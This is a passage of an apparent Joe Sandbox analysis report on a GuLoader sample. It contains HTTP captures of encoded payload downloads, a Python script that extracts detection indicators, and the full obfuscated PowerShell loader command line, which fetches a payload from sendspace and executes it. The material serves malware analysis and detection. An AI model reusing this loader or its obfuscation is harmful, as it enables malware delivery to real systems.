2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 62 6a 79 4d 68 54 30 36 2f 34 41 69 79 6b 36 6f 51 47 74 6d 55 6b 55 6c 50 45 5a 61 79 6d 5a 50 53 33 7a 72 67 78 2f 43 51 4e 71 7a 31 69 51 52 2f 6c 30 34 32 59 56 65 4b 32 39 49 61 74 73 50 59 4a 64 78 4e 50 61 78 62 73 67 33 64 4d 67 5a 69 74 36 65 62 4e 65 6e 39 49 63 72 75 4f 2b 5a 56 63 69 4b 53 43 4b 2f 4c 7a 59 45 48 45 68 52 75 70 6a 34 74 51 4b 30 51 35 4c 64 77 68 33 47 67 55 75 67 62 4f 57 54 34 44 67 43 70 4d 52 61 4d 37 45 68 50 41 39 58 33 39 45 43 6a 43 6f 65 62 56 72 33 57 44 35 65 6f 74 4f 44 77 6a 57 75 67 6b 75 67 61 56 2b 49 52 2b 38 43 75 51 77 4f 6c 4f 73 68 45 59 54 65 51 38 59 43 6f 64 64 67 55 50 6e 79 57 42 59 32 6f 64 4f 44 77 68 58 49 67 55 75 67 67 54 6b 5a 59 54 38 61 79 6c 4b 45 64 48 50 56 55 6b 46 42 55 4b 32 57 79 6d 49
Data Ascii: bjyMhT06/4Aiyk6oQGtmUkUlPEZaymZPS3zrgx/CQNqz1iQR/l042YVeK29IatsPYJdxNPaxbsg3dMgZit6ebNen9IcruO+ZVciKSCK/LzYEHEhRupj4tQK0Q5Ldwh3GgUugbOWT4DgCpMRaM7EhPA9X39ECjCoebVr3WD5eotODwjWugkugaV+IR+8CuQwOlOshEYTeQ8YCoddgUPnyWBY2odODwhXIgUuggTkZYT8aylKEdHPVUkFBUK2WymI
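Three things in sessions 0 and 1 are worth turning into checks: the request comes from powershell.exe yet carries a Firefox User-Agent; the server labels the file "Polyfon.csv" but serves it as application/octet-stream; and the body, whose raw bytes are the printable characters shown in Data Ascii, is base64 text rather than anything CSV-like. Decoding the first chunk shows machine code, and it is dense with the two-byte sequence EB 02 (x86 jmp short +2, which steps over two junk bytes). The script below is an added example, not code from the Joe Sandbox report; it carries session 1's request line, the relevant response headers and the first Data Ascii chunk as constructed inputs taken from the page, and the browser list, text-extension list and indicator names are my own choices. Sessions 2 and 3 (wab.exe fetching a .bin with the same User-Agent) would be assessed the same way by passing their values in.

```python
"""Indicators from sendspace sessions 0 and 1 above (added example, not Joe Sandbox code)."""
import base64
import re

# Constructed from session 1 of the report: the request start line and headers, the response
# headers that matter here, and the printable form of the first data chunk (base64 text; the
# page shows it truncated, so the decoder re-pads it).
PROCESS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REQUEST = """GET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n4.sendspace.com
Connection: Keep-Alive"""
RESPONSE = """HTTP/1.1 200 OK
Server: nginx
Content-Type: application/octet-stream
Content-Length: 489216
Content-Disposition: attachment;filename="Polyfon.csv"
Accept-Ranges: bytes"""
BODY = ("cQGbcQGbux9CDgDrAkKH6wI2uANcJARxAZvrAtkKubbjeMjrAgRE6wJXZ4Hpg6AADusCJTHrApgNgfEzQ3i6"
        "cQGb6wJQTesCwUfrAsU3unHMRY7rAnjl6wI6sesC0lBxAZsxyusCdqjrAtskiRQL6wI9LesCnwrR4usCE8zr"
        "AsQIg8EE6wLnl3EBm4H5oXCJA3zIcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wLH34HDuntZAesCOSVxAZu6BGPlDnE")

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}  # my list, not the report's
TEXT_EXTENSIONS = {".csv", ".txt", ".log", ".json", ".xml"}

def headers(message):
    """'Name: value' lines after the start line, keyed by lower-cased name."""
    fields = {}
    for line in message.splitlines()[1:]:
        name, _, value = line.partition(":")
        fields[name.strip().lower()] = value.strip()
    return fields

def decode_sample(body):
    """Decode a possibly truncated base64 chunk; None if it is not base64 at all."""
    body = body.strip()
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", body):
        return None
    return base64.b64decode(body + "=" * (-len(body) % 4))

def assess(process, request, response, body):
    """Indicator dictionary for one HTTP session: process, request, response headers, body sample."""
    req, resp = headers(request), headers(response)
    exe = process.rsplit("\\", 1)[-1].lower()
    match = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
    name = match.group(1) if match else ""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    decoded = decode_sample(body)
    return {
        # a browser User-Agent sent by something that is not a browser
        "browser_ua_from_non_browser": req.get("user-agent", "").startswith("Mozilla/") and exe not in BROWSERS,
        # a text-looking filename delivered as an opaque binary
        "text_name_binary_type": ext in TEXT_EXTENSIONS and resp.get("content-type", "").startswith("application/octet-stream"),
        "body_is_base64": decoded is not None,
        # EB 02 = jmp short +2, the jump-over-junk pattern the decoded sample is full of
        "jmp_short_2_count": decoded.count(b"\xeb\x02") if decoded else 0,
        "decoded_bytes": len(decoded) if decoded else 0,
    }

if __name__ == "__main__":
    for key, value in assess(PROCESS, REQUEST, RESPONSE, BODY).items():
        print(f"{key}: {value}")
```

All three boolean indicators come back true for session 1, and the roughly 190 decoded bytes contain EB 02 more than twenty times, which is far denser than compiled code normally is. The count is a triage heuristic for this family of obfuscation rather than a family signature, so it is reported as a number for an analyst to weigh, not collapsed into a verdict.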


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.649720104.21.28.804432948C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-05-23 19:12:55 UTC175OUTGET /pro/dl/ug8lu5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: www.sendspace.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-05-23 19:12:55 UTC968INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 23 May 2024 19:12:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: SID=o97eha0u97md48nbbdbvhl8653; path=/; domain=.sendspace.com
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Pragma: no-cache
                                                                                    Location: https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmzxfnCWYZjyWM4SpGhLbbuJjb7olGlu%2Byo8AN2ncZ4Ib%2FTTBo3zq02VZQApUbdX9%2Fvs1OfJnl%2FQK8dJ%2FCEbIIdFPMT0o%2F20JG9u9Z%2FzVQNvtkElhS%2FWfceupVDqC6MHCxzbBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 88875c38cba817b1-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
2024-05-23 19:12:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49721 | 69.31.136.174 | 443 | 2948 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:12:56 UTC | 316 | OUT | GET /dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: fs03n1.sendspace.com
                                                                                    Connection: Keep-Alive
                                                                                    Cookie: SID=o97eha0u97md48nbbdbvhl8653
2024-05-23 19:12:56 UTC | 440 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 23 May 2024 19:12:56 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 36928
                                                                                    Last-Modified: Fri, 17 May 2024 15:06:46 GMT
                                                                                    Connection: close
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Content-Disposition: attachment;filename="EwcTRqORRXkTdykugKGXjGVoR103.bin"
                                                                                    ETag: "66477286-9040"
                                                                                    Accept-Ranges: bytes
                                                                                    2024-05-23 19:12:56 UTC15944INData Raw: 3d 35 51 9e 72 8f 9f a4 8f 75 bb 68 ae 19 b5 5a 7f d8 b8 35 40 b4 5f 37 6b 2c d4 4c 13 7f eb a4 08 d1 d2 8b c8 8a 60 fa 6f 2d b0 05 35 57 b2 ad 48 af bf a3 e3 55 af a7 e6 da bb b6 1d b6 d1 f0 dc 74 f9 74 e8 02 6d 84 b2 25 9d 6d 52 e4 c9 2e e1 d9 34 c7 1b 3b f5 28 13 f5 ab 1e aa f3 73 ba 2f da 0e 5a 42 74 05 6c 82 7b 9e 19 61 c8 07 0e d6 6c 84 8c 75 74 08 b8 44 05 1f 8a fa 7d 8d 15 b7 4e d5 92 bc b0 7d 76 34 53 de a6 88 47 b8 5f 8f b2 cd 38 d7 15 61 d2 51 ca 81 91 ec f5 b5 08 23 32 b4 2f f3 7e d8 db fe a3 34 4a b7 f2 dd 86 a2 e6 7b 54 69 df 2d ee fd 14 cd 41 59 47 5d 18 63 36 c5 5e c8 31 26 b0 61 e4 f7 84 62 a7 97 3d 94 f2 3a ad c5 0c 3c 73 0d 54 be d1 bb 40 42 0e 98 20 21 47 78 73 b4 7b 3f 33 5c b4 f9 0d 6a 2e dd 22 ac 19 24 8e 74 ec 72 a4 50 82 20 05 31
                                                                                    Data Ascii: =5QruhZ5@_7k,L`o-5WHUttm%mR.4;(s/ZBtl{alutD}N}v4SG_8aQ#2/~4J{Ti-AYG]c6^1&ab=:<sT@B !Gxs{?3\j."$trP 1
                                                                                    2024-05-23 19:12:56 UTC16384INData Raw: dd e2 ac 19 37 86 d1 ed 30 84 51 82 dc 27 31 14 bb a7 48 92 a7 06 24 36 0d 60 d6 14 da 42 57 fe 76 d5 e2 d0 57 a2 ca a2 5c 03 62 67 32 f3 c3 59 a0 d7 8f 26 a4 90 6b 6a d4 77 69 71 ea 79 ad 50 66 0d b7 7a d2 50 6b d4 f4 2b 89 f6 c2 8f 41 6e 53 f3 d6 b9 4f f7 e9 99 54 f9 cb ee 96 e6 66 51 da 7b 02 4e 47 d5 a4 8c 9c 85 c0 08 bd 3e 14 8a 26 e0 54 ce 24 80 ea 8a 30 0b 41 94 d6 ed de 19 c8 25 6b d5 7b 04 16 c5 b0 c3 24 dd 85 e5 d5 a2 cd 72 6e 49 da 5e c2 2a 40 e9 71 6a 1a 09 ba 59 39 30 d2 c6 4e 03 11 b3 74 a3 63 0c 78 b5 c7 46 37 27 a1 46 36 af 3a a2 3c 83 20 18 60 cd f2 13 d3 60 a3 d1 ae 42 fa c2 f0 11 dc d5 3a e2 09 52 7a 00 44 4c a0 02 55 ce 88 80 74 23 74 3d a8 7b ed fb 1d 37 a3 e3 2f fd 4f 3a f9 ef bd 95 ed 75 37 37 c8 18 72 d2 e4 a8 14 9f 03 79 1e c9 5c
                                                                                    Data Ascii: 70Q'1H$6`BWvW\bg2Y&kjwiqyPfzPk+AnSOTfQ{NG>&T$0A%k{$rnI^*@qjY90NtcxF7'F6:< ``B:RzDLUt#t={7/O:u77ry\
                                                                                    2024-05-23 19:12:56 UTC4600INData Raw: 2e c3 eb 8e 3a 60 8f 8f a8 bd 3d 60 21 40 c5 6c 4f 2f 5a 52 09 73 fe e2 f5 c1 9d c4 6b 60 3c a7 6e d6 b0 3f f5 86 43 a8 df ce 81 69 19 06 32 1a 73 f8 2b 71 26 d2 86 53 fa ba bf 28 70 26 48 17 06 87 01 9f 17 16 66 71 8d 9a a5 21 d8 e5 15 18 8b 34 dd d2 24 a6 88 2a 03 e1 a4 4e 55 1e 6f 96 62 3a f8 1c dd e1 2b 86 9a 8c 96 17 ec bf c9 48 39 bb fb 24 f4 0d b5 4b c6 73 96 1b ed f1 8d c8 d6 e3 f9 a3 c8 26 10 59 6d ff 2a 0d ff a8 60 f2 96 83 26 6a 33 24 04 3f 3c 23 71 ca d8 c6 8d 3a 7f 03 c0 06 3f 85 8f 9f 4a b0 0f 94 b3 51 d9 38 57 c5 54 68 0a 05 f5 ff 74 2d d4 40 dd fc 79 8e 4c a7 a4 26 2c d0 3c 35 c8 1d c7 b3 41 46 a0 27 ce 29 50 ac 2a 71 8a fa 3f 41 fe 0a f4 54 ee 23 45 0c 98 47 8b 1d de 67 7b 03 a1 84 5b 44 a5 67 6a e1 a5 25 13 0a a7 de 86 a9 0b 7f f0 5b ce
                                                                                    Data Ascii: .:`=`!@lO/ZRsk`<n?Ci2s+q&S(p&Hfq!4$*NUob:+H9$Ks&Ym*`&j3$?<#q:?JQ8WTht-@yL&,<5AF')P*q?AT#EGg{[Dgj%[


                                                                                    Target ID:0
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
                                                                                    Imagebase:0x7ff626eb0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. 
Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% 
Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
                                                                                    Imagebase:0x7ff6e3d50000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:15:12:12
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
                                                                                    Imagebase:0x7ff626eb0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:15:12:19
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. 
